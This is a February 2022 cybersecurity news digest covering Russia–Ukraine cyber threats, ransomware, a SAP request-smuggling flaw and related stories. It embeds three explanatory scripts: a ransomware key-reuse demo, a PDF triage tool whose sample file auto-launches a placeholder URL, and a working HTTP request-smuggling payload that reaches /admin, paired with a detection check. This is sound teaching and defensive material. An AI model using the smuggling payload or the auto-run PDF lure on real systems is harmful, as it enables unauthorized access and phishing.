Sunday, February 13, 2022 // (IG): BB //Weekly Sponsor: BLKTRIANGLE
Russians Have Already Started Hybrid War With Bomb Threats, Cyberattacks, Ukraine Says
FROM THE MEDIA: Ukraine—U.S. officials are warning that Russia could be about to attack Ukraine. For many citizens in this embattled country, the assault has already begun. Ukrainian officials say that Russia, which has positioned more than 100,000 troops around three sides of Ukraine, is stepping up a destabilization campaign involving cyberattacks, economic disruption and a new tactic: hundreds of fake bomb threats. Russian forces and their proxies already control portions of Ukraine and frequently skirmish with government forces. The aim of Moscow’s intensifying hybrid campaign, Ukrainian officials say, is to weaken their country and sow panic, potentially provoking discontent and protests of the kind Russia fomented in eastern Ukraine in 2014 to justify its interventions there. U.S. and U.K. officials said last month they uncovered coup plots intended to install a puppet pro-Russian government. The tactics illustrate how Russian President Vladimir Putin can maintain pressure on Ukraine without escalating to a shooting war that could provoke sanctions from the West. Ukrainian officials say a destabilization campaign is more likely than a large-scale invasion.
READ THE STORY: WSJ
US cyber defense agency warns of possible Russian cyberattacks amid tensions
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) has issued a "Shields Up" alert for American organizations saying that U.S. systems could face Russian cyberattacks amid warnings from Biden administration officials that a Russian invasion of Ukraine could be imminent. With U.S. officials warning on Friday that Russia could invade Ukraine "any day now," CISA's alert recommended that all organizations in the U.S., regardless of size, "adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets." "While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine," CISA said. NBC News reported that the agency issued the alert Friday night. Russia has amassed more than 100,000 troops on the Ukrainian border, creating a tense standoff in the international community over an expected invasion. President Biden warned Russian leader Vladimir Putin on Saturday that Russia would face "swift and severe costs" if it chooses to invade Ukraine. White House national security advisers told reporters a day earlier that "Russians are in a position to be able to mount a major military action in Ukraine any day" and that an invasion could begin before the end of the Winter Olympics on Feb. 20.
READ THE STORY: The Hill
Ukraine shores up cyber defenses in readiness for Russian attack
FROM THE MEDIA: Viktor Zhora proudly showed off the new facilities at one of Ukraine’s cyber security agencies, where opposing teams stage mock battles to prepare for the real thing. The training is paying off, said Zhora, deputy chair of the State Service of Special Communications and Information Protection, the country’s security and intelligence service. An attack last month that targeted government websites was quickly contained by his staff with the help of IT companies including Microsoft, he said. “We need to align our activities with risk and threats that have been increasing in past years . . . We should always be ready for the worst,” Zhora said. Ukraine said “all evidence” pointed to Russian responsibility, with officials and analysts saying this was just the tip of the iceberg. The country has been under constant attack from Russian and Kremlin-backed hackers since Moscow’s 2014 annexation of Crimea. Cyber espionage, damage to databases and servers, disruption to power and communications and disinformation are all part of the playbook. With Russia massing more than 100,000 troops on the Ukraine border and western powers accusing Moscow of planning a full-blown invasion, the Kyiv government and independent experts expect hostile cyber activity to increase in an effort to destabilise the country before or during any attack.
READ THE STORY: Financial Times
Planning for a Nation-State Cyber Attack — Are You Ready?
FROM THE MEDIA: Some global experts are predicting a significant cyber attack against U.S. and UK critical infrastructure if Russia invades Ukraine. Whether it happens or not, is your organization prepared for this scenario? Warnings are pouring in from all over the world about the U.S. and U.K. domestic impacts resulting from a potential attack on Ukraine from Russia. Assuming the U.S. imposes sanctions or takes other retaliatory measures against Russia should an invasion occur, experts say that cyber attacks could be launched against U.S. and U.K. businesses and even government agencies. Regardless of whether you believe Russia will attack Ukraine over the next few months, it is important for all enterprises to prepare for this scenario. Other related cyber attack scenarios include a Chinese invasion of Taiwan.
Scenario planning for cyber attacks is the norm for smart public- and private-sector enterprises, and this type of situation is often viewed as a worst-case scenario by some, thus the reluctance to discuss it openly in the media. Nevertheless, in my opinion, it is an important topic for state and local governments to consider given the current situation with Russia and Ukraine. This article from James Lewis at the Center for Strategic and International Studies (CSIS) earlier this month provides some good background and context on “Russia and the Threat of Massive Cyberattack.”
In addition, the Cybersecurity and Infrastructure Security Agency (CISA) released this important alert in January, and I published this blog on the topic last month, saying to pay attention.
READ THE STORY: Govtech
Facebook exposes ‘god mode’ token that could siphon data
FROM THE MEDIA: Ban of Chrome extension by Brave reveals risk of potential API abuse at Meta. Brave this week said it is blocking the installation of a popular Chrome extension called L.O.C. because it exposes users’ Facebook data to potential theft. “If a user is already logged into Facebook, installing this extension will automatically grant a third-party server access to some of the user’s Facebook data,” explained Francois Marier, a security engineer at Brave, in a GitHub Issues post. “The API used by the extension does not cause Facebook to show a permission prompt to the user before the application’s access token is issued.” However, the developer of the extension, Loc Mai, told The Register that his extension is not harvesting information – as the extension’s privacy policy states. The extension currently has around 700,000 users. “The extension does not collect the user’s data unless the user becomes a Premium user, and the only thing it collects is UID – which is unique to each person,” explained Mai. Mai said the extension stores the token locally, under localStorage.touch. That presents a security risk, since anything in localStorage is readable by any script running in the same origin, but it isn’t indicative of wrongdoing. L.O.C. continues to be available through the Chrome Web Store.
READ THE STORY: Cyber Reports
San Francisco 49ers NFL team discloses BlackByte ransomware attack
FROM THE MEDIA: The team told The Record that it immediately launched an investigation into the attack and took steps to contain the incident with the help of third-party cybersecurity firms; it also notified law enforcement. The company added that it has no indication that the security breach involved systems outside of its corporate network, such as those connected to ticket holders. The Record pointed out that the consequences of the ransomware attack could have been catastrophic, given the impact on the team’s game preparations, had the team qualified for Super Bowl LVI. The BlackByte ransomware operation has been active since September 2021; in October 2021 researchers from Trustwave’s SpiderLabs released a decryptor that allows victims of the BlackByte ransomware to restore their files for free. The experts spotted BlackByte while investigating a malware incident. Analysis of the ransomware revealed that it was developed to avoid infecting systems that primarily use Russian or related languages. Unlike other ransomware families that generate a unique key for each session, that version of BlackByte used the same raw key to encrypt files with the symmetric-key algorithm AES, so anyone who could obtain the raw key would be able to decrypt the files. Trustwave researchers exploited this poor coding to build the decryptor.
READ THE STORY: Security Affairs
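The BlackByte item above turns on one design error: a single raw symmetric key, the same for every file and every victim, so extracting it once yields a universal decryptor. The example below is added here to show that failure next to the per-file-key design that avoids it; it is neither BlackByte's code nor Trustwave's decryptor. AES is not in the Python standard library, so the cipher is a counter-mode keystream built from HMAC-SHA256 standing in for AES-CTR, and the "static key", the file names and their contents are all constructed for the demonstration. The key-management lesson does not depend on which block cipher is underneath.

```python
"""Why one shared raw key hands defenders a universal decryptor (added illustration).

HMAC-SHA256 in counter mode is used as a stand-in for AES-CTR because the
standard library has no AES; STATIC_KEY and the sample files are constructed.
"""
import hashlib
import hmac
import os


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stand-in for AES-CTR: XOR data with HMAC-SHA256(key, nonce || counter) blocks.
    The same call both encrypts and decrypts."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


# Constructed sample "victim" files.
FILES = {
    "invoice.docx": b"Q3 invoices for the ticketing vendor",
    "playbook.pdf": b"Game-day preparation notes",
}

# Design 1 (the flaw the article describes): one raw key baked into the sample and
# reused for every file on every victim. In this toy the nonce is fixed as well.
STATIC_KEY = hashlib.sha256(b"constructed-static-key-not-from-any-sample").digest()
STATIC_NONCE = bytes(12)


def encrypt_static(files: dict) -> dict:
    """Encrypt every file under the one shared key and nonce."""
    return {name: keystream_xor(STATIC_KEY, STATIC_NONCE, data) for name, data in files.items()}


def decrypt_all_with_recovered_static_key(encrypted: dict) -> dict:
    """Defender's view: STATIC_KEY was pulled once from one sample; it opens every file."""
    return {name: keystream_xor(STATIC_KEY, STATIC_NONCE, ct) for name, ct in encrypted.items()}


def shared_keystream_leak(encrypted: dict, a: str, b: str) -> bytes:
    """Same key and nonce everywhere means the same keystream everywhere, so
    ct_a XOR ct_b == pt_a XOR pt_b: ciphertexts leak about each other before
    anyone has the key at all."""
    return bytes(x ^ y for x, y in zip(encrypted[a], encrypted[b]))


# Design 2 (how a correctly built scheme avoids this): fresh random key and nonce per
# file. Real ransomware then wraps each file key with the operator's public key so only
# the operator can unwrap it; that wrapping step is omitted here.
def encrypt_per_file(files: dict) -> dict:
    out = {}
    for name, data in files.items():
        file_key, nonce = os.urandom(32), os.urandom(12)
        out[name] = (file_key, nonce, keystream_xor(file_key, nonce, data))
    return out


def key_from_one_file_opens_another(encrypted: dict, src: str, dst: str) -> bool:
    """Under per-file keys, a key recovered from one file is useless for the next."""
    src_key = encrypted[src][0]
    _, nonce, ct = encrypted[dst]
    return keystream_xor(src_key, nonce, ct) == FILES[dst]


if __name__ == "__main__":
    static = encrypt_static(FILES)
    print("static key recovers all files:", decrypt_all_with_recovered_static_key(static) == FILES)
    per_file = encrypt_per_file(FILES)
    print("per-file key transfers to another file:",
          key_from_one_file_opens_another(per_file, "invoice.docx", "playbook.pdf"))
```

The check a responder cares about is the first one: if a sample's key is a constant, every victim of that build is recoverable from one extraction, which is exactly what a public decryptor relies on. The second function shows why a fixed key and nonce are worse than key reuse alone: two ciphertexts XOR to the XOR of their plaintexts.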
Analyzing Phishing attacks that use malicious PDFs
FROM THE MEDIA: A step-by-step walkthrough of looking at a malicious PDF. Every day everybody receives many phishing attacks with malicious docs or PDFs. I decided to take a look at one of these files. I did a static analysis and I went straight to the point to make this reading simple and fast. Here is the received email, as if it were from the Caixa Economica Federal bank, but we can see the sender uses Gmail services and a strange name.
READ THE STORY: Security Affairs
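The static analysis the walkthrough above describes usually starts the same way: count the keywords that give a PDF a way to act on open (/OpenAction, /AA) or run code (/JavaScript, /JS, /Launch), then inflate any FlateDecode streams, because the payload and its URL are normally compressed and invisible to a plain grep. The script below is added here as an illustration of that triage; it is not the author's tooling or sample. The PDF it inspects is constructed inline, the hostname in it is a placeholder rather than an indicator, and the parsing is a regex skim good enough for a first pass, not a conforming PDF parser (object streams, nested dictionaries and indirect /Length values are outside its reach).

```python
"""First-pass static triage of a PDF lure (added illustration; constructed sample)."""
import re
import zlib

# Constructed lure: the catalog's /OpenAction points at a JavaScript action whose
# script lives in a FlateDecode-compressed stream. example.invalid is a placeholder.
SAMPLE_JS = b"app.launchURL('http://example.invalid/caixa', true);"
COMPRESSED_JS = zlib.compress(SAMPLE_JS)
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n"
    b"5 0 obj << /Length " + str(len(COMPRESSED_JS)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + COMPRESSED_JS + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Names that indicate automatic actions, script, launches or hidden objects.
KEYWORDS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
            b"/URI", b"/EmbeddedFile", b"/SubmitForm", b"/ObjStm", b"/RichMedia"]


def count_keywords(pdf: bytes) -> dict:
    """Count each keyword as a whole name, so /JS does not also match /JavaScript."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", pdf))
            for k in KEYWORDS}


def extract_streams(pdf: bytes) -> list:
    """Return (dictionary, body) per stream, inflating FlateDecode bodies."""
    streams = []
    for m in re.finditer(rb"<<([^<>]*)>>\s*stream\r?\n", pdf):
        d = m.group(1)
        start = m.end()
        # Direct /Length only; an indirect "/Length 6 0 R" falls back to scanning for endstream.
        length = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", d)
        end = start + int(length.group(1)) if length else pdf.find(b"endstream", start)
        body = pdf[start:end]
        if b"/FlateDecode" in d:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # corrupt or deliberately broken stream: keep the raw bytes
        streams.append((d.strip(), body))
    return streams


def triage(pdf: bytes) -> dict:
    """Keyword counts, decoded script bodies, URLs and a coarse verdict."""
    counts = count_keywords(pdf)
    bodies = [body for _, body in extract_streams(pdf)]
    # Acrobat's JavaScript API objects are a cheap tell for script payloads.
    js = [b for b in bodies if re.search(rb"\b(app|this|util|event)\.", b)]
    urls = sorted(set(re.findall(rb"https?://[^\s'\")<>]+", b"\n".join(bodies) + pdf)))
    auto = counts["/OpenAction"] + counts["/AA"]
    script = counts["/JavaScript"] + counts["/JS"] + counts["/Launch"]
    verdict = ("suspicious: auto-action plus script/launch" if auto and script
               else "no auto-executed script found")
    return {"keywords": counts, "streams": len(bodies), "javascript": js,
            "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PDF).items():
        print(f"{key}: {value}")
```

Run against a real sample, the interesting output is the decoded stream list and the URLs pulled from it; a document that has /OpenAction but no script keywords at all is worth a second look too, since the action may be a /Launch or /URI rather than JavaScript.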
The China tech theft threat
FROM THE MEDIA: The fact that China commits corporate espionage isn’t breaking news. But, if you are reading this article, odds are China has already stolen your personal data. In 2017, Chinese military-backed hackers infiltrated the computer systems of the credit report agency Equifax, making off with the personal information of over 150 million people. Another Chinese group successfully hacked the federal Office of Personnel Management three years earlier. And while four Chinese citizens were eventually indicted on charges including the Equifax theft, China and its cybercrime network have never stopped stealing from U.S. firms. On a daily basis, they target healthcare providers, utilities, universities, software companies, manufacturers… Anyone who has anything of value online is a target for Chinese theft, and it is a multilayered policy of China to steal every bit of tech and data they can get their hands on. These hacks are not random crimes. They are just one part of a much larger plan for technological dominance. China’s 14th five-year plan includes a "Made in China 2025" project that identifies a dozen technologies China wants to be the world leader in, including artificial intelligence, biotechnology, semiconductors, quantum information systems, and drones.
READ THE STORY: Washington Examiner
Major SAP vulnerability requires urgent patch to prevent HTTP request smuggling attacks
FROM THE MEDIA: Security researchers, enterprise software maker SAP, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued warnings over a critical vulnerability affecting Internet Communication Manager (ICM), a core component of SAP business applications that handles HTTP and HTTPS communications. Tracked as CVE-2022-22536, the vulnerability allows attackers to use malformed packets to trick SAP servers into exposing sensitive data without needing to authenticate, according to Onapsis Research Labs. A security patch is available and organisations are urged to update as soon as possible. Exploitation is possible via a simple HTTP request: in a report, Onapsis stated that the vulnerability can be exploited via an attack known as HTTP request smuggling, which can be used to steal credentials and session information from unpatched SAP servers even if the servers are placed behind proxies. “A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” it added. A post on SAP’s website confirmed the severity of the issue, which was announced at the same time as two other, less serious SAP vulnerabilities tracked as CVE-2022-22532 and CVE-2022-22533. “If your organisation’s program was exploited, these vulnerabilities, a.k.a. “ICMAD,” will enable attackers to execute serious malicious activity on SAP users, business information, and processes,” SAP said.
READ THE STORY: Reseller
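The advisory above names the attack class, HTTP request smuggling, without describing the ICMAD packet format, and this example does not try to fill that in: it is an added illustration of the generic CL.TE desync, not the CVE-2022-22536 exploit, written for this digest rather than taken from Onapsis or SAP. The mechanism it shows is the one the advisory's "even behind proxies" remark depends on: a front end that frames the request by Content-Length forwards bytes that a back end framing by Transfer-Encoding: chunked reads as a second, attacker-chosen request. The payload, the sap.example host and the /admin path are constructed; the last function is the gateway check a practitioner would add regardless of product.

```python
"""Generic CL.TE request-smuggling desync (added illustration; not the ICMAD packet format).

Two HTTP parsers on the same path disagree about where one request ends, so bytes the
front end forwards as a body become a new request at the back end. Payload, host and
path are constructed for the demonstration.
"""

SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: sap.example\r\n\r\n"   # the request the proxy never sees
BODY = b"0\r\n\r\n" + SMUGGLED                                      # zero-size chunk, then the smuggled bytes

# Content-Length covers the whole body (what the proxy trusts); Transfer-Encoding says
# "chunked" (what the origin trusts). The two headers contradict each other on purpose.
RAW = (
    b"POST / HTTP/1.1\r\n"
    b"Host: sap.example\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + BODY
)


def parse_headers(buf: bytes):
    """Split one request into (request line, lowercase header dict, bytes after the blank line)."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def front_end_split(buf: bytes):
    """Proxy that frames by Content-Length: returns (request line, body, unconsumed bytes)."""
    request_line, headers, rest = parse_headers(buf)
    n = int(headers.get(b"content-length", b"0"))
    return request_line, rest[:n], rest[n:]


def back_end_split(buf: bytes):
    """Origin that frames by Transfer-Encoding: chunked, stopping at the 0-size chunk."""
    request_line, headers, rest = parse_headers(buf)
    if headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        n = int(headers.get(b"content-length", b"0"))
        return request_line, rest[:n], rest[n:]
    body, pos = b"", 0
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            pos = rest.index(b"\r\n", pos) + 2   # consume the (empty) trailer section
            break
        body += rest[pos:pos + size]
        pos += size + 2                          # skip chunk data and its CRLF
    return request_line, body, rest[pos:]


def smuggled_request_line(buf: bytes) -> bytes:
    """What the origin treats as the *next* request after the proxy thinks it is done."""
    leftover = back_end_split(buf)[2]
    return parse_headers(leftover)[0] if leftover else b""


def reject_ambiguous_framing(buf: bytes) -> bool:
    """Gateway check. RFC 7230 s.3.3.3: Transfer-Encoding overrides Content-Length, and a
    message carrying both may be a smuggling attempt that ought to be treated as an error.
    Refuse it outright, and refuse any transfer-coding other than a final 'chunked'."""
    _, headers, _ = parse_headers(buf)
    te = headers.get(b"transfer-encoding")
    cl = headers.get(b"content-length")
    if te is not None and cl is not None:
        return True
    if te is not None and te.lower() != b"chunked":
        return True
    return False


if __name__ == "__main__":
    print("proxy leftover  :", front_end_split(RAW)[2])        # b''  (proxy saw one request)
    print("origin next line:", smuggled_request_line(RAW))    # b'GET /admin HTTP/1.1'
    print("gateway rejects :", reject_ambiguous_framing(RAW))  # True
```

The two splits are the whole bug: the proxy's leftover is empty, so any per-request controls it applied were applied to the POST only, while the origin's leftover is a complete GET /admin that arrives with whatever trust the connection already carries. Vendors fix the parser; operators can still add the framing check in front of any back end whose chunked handling they do not control.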
There's a social media link to human trafficking, claims Jamaica Constabulary Force (JCF)
FROM THE MEDIA: The Jamaica Constabulary Force (JCF) says because of improper and unmonitored Internet use among children, it has noticed a link between social media and human trafficking. At the same time, the force says it also suspects that recent missing people cases stem from connections made with perpetrators on social media sites. “On trends, I believe that there is a close relationship between social media and, of course, missing persons. We see a lot of youngsters... they meet anonymous persons online, not knowing who they are communicating with. We have had cases where young persons, schoolchildren have lost their lives, some are missing and have not returned, but we're still happy that we do have some level of skillset to assist in locating persons who become missing,” Deputy Superintendent Warren Williams, head of the Communications, Forensic and Cybercrimes Division at the JCF, told the Jamaica Observer in an interview. “The more persons are online, the more they meet persons online, they share a lot of personal information. Not only in meeting, but, of course, the Instagram, all of these popular social media.” Williams, who was addressing Jamaica Observer reporters during Flow's Safer Internet think tank, last Thursday, said the division is also aware of an association fostering human trafficking of youngsters in Jamaica. “A lot of persons talk about fishing and sexual grooming. Youngsters get online and they are engaged in arguments and directions that are not appropriate. They [traffickers] get these youngsters to showcase their body parts and all kinds of things. Sometimes they are trafficked, or their body parts are trafficked to all kinds of employment outside of Jamaica, which is not fit for their age group. We are seeing cases like these and it's quite a concern,” he told the Sunday Observer.
READ THE STORY: Jamaica Observer
Items of interest
Band of Brothers: The Wagner Group and the Russian State (Article)
FROM THE MEDIA: This article is part of the CSIS executive education program Understanding the Russian Military Today. The Russian private military company Wagner Group may appear to be a conventional business company. However, its management and operations are deeply intertwined with the Russian military and intelligence community. The Russian government has found Wagner and other private military companies to be useful as a way to extend its influence overseas without the visibility and intrusiveness of state military forces. As a result, Wagner should be considered a proxy organization of the Russian state rather than a private company selling services on the open market. The post-Cold War era brought a renaissance of private security companies (PSCs) and private military companies (PMCs). Both state and non-state actors have frequently relied on their services, as these companies are more flexible, cheaper, less accountable, and often a lot more capable than regular militaries. Conflicts of the 21st century, particularly the wars in Afghanistan and Iraq, saw PMCs getting involved on all levels, from providing logistical support to high-intensity operations.
READ THE STORY: CSIS
Russia’s Wagner Group Moved To Ukraine l How Putin Uses The Mercenaries To Fulfil His Objectives (Video)
FROM THE MEDIA: Tensions in Ukraine are expected to escalate further due to the reported involvement of Russia’s infamous Wagner Group. According to reports, an unprecedented number of Wagner mercenaries left Africa for Eastern Europe in January. The exodus of Wagner mercenaries has come at a time when war is looming large over Ukraine. More Russian mercenaries are expected to leave Africa and the news has left Europe worried. Kyiv’s military intelligence recently alleged that Russia is actively recruiting mercenaries to fight in the ongoing conflict.
The Wagner Group: Untangling the Purpose behind a Russian Power Tool (Video)
FROM THE MEDIA: The Wagner Group (Russian: Группа Вагнера, romanized: Gruppa Vagnera), also known as PMC Wagner, ChVK Wagner (ChVK being the Russian abbreviation for Private Military Company), or CHVK Vagner (ЧВК Вагнера ChVK Vagnera, Частная Военная Компания Вагнера), is a Russian paramilitary organization. Some have described it as a private military company (or private military contracting agency), whose contractors have reportedly taken part in various conflicts, including operations in the Syrian civil war on the side of the Syrian government as well as, from 2014 until 2015, in the war in Donbas in Ukraine aiding the separatist forces of the self-declared Donetsk and Luhansk people's republics.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com